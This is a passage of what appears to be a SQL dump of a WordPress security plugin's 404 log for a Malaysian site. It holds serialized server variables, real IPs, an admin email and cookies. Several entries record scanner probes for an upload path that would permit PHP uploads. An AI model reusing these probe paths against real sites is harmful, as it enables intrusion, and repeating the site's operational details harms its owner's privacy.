ERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajKyvb4yAloRZFRtQOUvQAAAUE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571343050.4215\";s:12:\"REQUEST_TIME\";s:10:\"1571343050\";}}','notice','2019-10-17 20:10:52','2019-10-17 20:10:50',34936264,36747304,'https://bintara.com.my/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.47.85'),(28238,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:94:\"/sys/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=20cd898b8c6f5f7b099eefa13fd7cd25\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:116:\"http://bintara.com.my//sys/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:98:\"https://bintara.com.my/sys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:76:\"/sys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajK1Pb4yAloRZFRtQOUxAAAAVQ\";s:12:\"REDIRECT_URL\";s:76:\"/sys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.47.85\";s:11:\"REMOTE_PORT\";s:5:\"64626\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:98:\"https://bintara.com.my/sys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:76:\"/sys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajK1Pb4yAloRZFRtQOUxAAAAVQ\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571343060.6622\";s:12:\"REQUEST_TIME\";s:10:\"1571343060\";}}','notice','2019-10-17 20:11:02','2019-10-17 20:11:01',34931576,36739952,'https://bintara.com.my/sys/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.47.85'),(28239,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:97:\"/houtai/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=6923c7f05b5efc7d53000b10a76ec305\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:119:\"http://bintara.com.my//houtai/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:101:\"https://bintara.com.my/houtai/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:79:\"/houtai/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajK3Pb4yAloRZFRtQOUywAAAVM\";s:12:\"REDIRECT_URL\";s:79:\"/houtai/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.47.85\";s:11:\"REMOTE_PORT\";s:5:\"64988\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:101:\"https://bintara.com.my/houtai/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:79:\"/houtai/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajK3Pb4yAloRZFRtQOUywAAAVM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571343069.3547\";s:12:\"REQUEST_TIME\";s:10:\"1571343069\";}}','notice','2019-10-17 20:11:10','2019-10-17 20:11:09',34936264,36747304,'https://bintara.com.my/houtai/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.47.85'),(27868,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ8T0QllZW5rbcASCZtvOAAAAUo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"49.50.237.136\";s:11:\"REMOTE_PORT\";s:5:\"35174\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ8T0QllZW5rbcASCZtvOAAAAUo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570706387.1217\";s:12:\"REQUEST_TIME\";s:10:\"1570706387\";}}','notice','2019-10-10 11:20:06','2019-10-10 11:19:47',35399104,37197376,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'49.50.237.136'),(27869,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570705953.9580559730529785156250\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570705953.9580559730529785156250\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570705953.9580559730529785156250\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570705953.9580559730529785156250\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"45062\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570705953.9580559730529785156250\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ8SIRypZvX7@gJ12mPWQgAAAIA\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ8SIRypZvX7@gJ12mPWQgAAAIA\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"45062\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ8SIRypZvX7@gJ12mPWQgAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570706859.3458\";s:12:\"REQUEST_TIME\";s:10:\"1570706859\";}}','notice','2019-10-10 11:28:03','2019-10-10 11:27:43',35075936,35328256,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570705953.9580559730529785156250',1,0,'103.6.198.69'),(27911,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570792016.9445478916168212890625\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570792016.9445478916168212890625\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570792016.9445478916168212890625\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570792016.9445478916168212890625\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"36496\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570792016.9445478916168212890625\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaBiUG8ZiIu6tWuksp5vsQAAANM\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaBiUG8ZiIu6tWuksp5vsQAAANM\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"36496\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaBiUG8ZiIu6tWuksp5vsQAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570792922.9829\";s:12:\"REQUEST_TIME\";s:10:\"1570792922\";}}','notice','2019-10-11 11:22:23','2019-10-11 11:22:07',35056864,35308600,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570792016.9445478916168212890625',1,0,'103.6.198.69'),(27912,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, 